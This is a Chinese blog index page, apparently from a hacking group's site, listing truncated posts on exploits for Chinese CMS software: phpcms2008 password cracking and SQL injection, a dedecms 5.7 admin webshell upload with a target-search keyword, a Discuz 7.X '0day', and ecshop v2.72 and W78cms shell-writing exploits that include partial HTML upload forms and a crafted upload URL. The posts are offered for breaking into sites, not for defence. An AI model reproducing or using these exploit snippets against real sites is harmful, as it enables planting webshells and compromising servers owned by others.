预览模式: 普通 | 列表

phpcms2008密码暴力破解

来源:Dis9 Team users==>chowner

说明下,这个确实比较蛋疼没啥意义,是在我之前检测一个站的时候发现是phpcms2008的,看了下加密方式,随便就弄了个试了下,发现代码版块帖子太少了实在不忍心干脆发来凑个数,admin别ban我ID啊,呵呵。
phpcms2008的加密方式

查看更多...

Tags: phpcms

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 16

dedecms 5.7后台拿SHELL漏洞

漏洞说明:dedecms 5.7教之前的版本有了很大的改进,修复了5.6以下版本严重的上传0day;相当的鸡肋,前提是有了后台权限。由于系统自带的文件管理器插件没有过滤文件上传及编辑后保存的文件名,导致直接写入webshell漏洞。

方法一见:dedecms5.7拿SHELL漏洞即修复

关键词:Powered by DedeCMSV57_GBK

查看更多...

Tags: dedecms

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 37

PhpCms2008 注射漏洞0day

代码分析说明:

01 case ''list'':

02 $catid = intval($catid);

查看更多...

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 71

Discuz7.X通杀0day

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__–==__–==__–==__–==__–==__–==__–==__–==__–==__–==

查看更多...

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 88

ecshop v2.72 前台写shell漏洞

<title>ecshop v2.72 前台写shell漏洞 by:xhm1n9</title>

<form method=”post” name=”register” action=”http://127.1/ecshop2.72/demo/index.php”>

<h3>ecshop v2.72 前台写shell漏洞</h3><br>利用方试:提交两次,第二次内容任意</br>

查看更多...

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 81

W78cms网站管理系统0day

访问这个地址
http://xxx.com/nbwebshell/admin/ ... cusdir=sitedirsec.asp
访问这个地址可以建立个sitedirsec.asp的文件夹……
再用这个html代码上传。
<form action=" http://www.xxxx.com/ShopMore.asp?id=16&Page=1/nbwebshell/admin/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=sitedirsec.asp" method=post name=myform enctype="multipart/form-data">

查看更多...

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 72